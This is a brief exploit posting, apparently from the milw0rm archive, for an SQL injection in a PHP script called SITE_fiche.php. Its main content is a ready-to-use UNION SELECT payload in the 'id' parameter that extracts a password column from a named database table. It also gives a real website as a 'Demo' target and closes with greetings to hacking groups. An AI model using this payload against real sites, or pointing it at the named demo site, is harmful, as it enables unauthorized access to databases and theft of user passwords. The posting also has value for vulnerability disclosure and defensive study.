--------------------------------------------------------------------------
Ger Versluis 2000 version 5.5 24 SITE_fiche.php SQL Injection Vulnerability
--------------------------------------------------------------------------
###################################################
[+] Author : DeCo017
[+] Email : 5s5[at]live[dot]fr
[+] Vulnerability : SQL injection
###################################################
Example:
http://www.site.com/path/SITE_fiche.php?id=-136++UNION SELECT 1,2,3,4,5,6,7,8,9,10,motdepasse,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95+from+IFI.CLASSCIMES_EVT_TMP/*
Demo :
http://www.ffme.fr/via-ferrata/SITE_fiche.php?id=136
Thanks for hack4love, rayo, saad, xweb, dbattack, x-sombrio, darkmaster and all 3asfh members
# milw0rm.com [2009-07-17]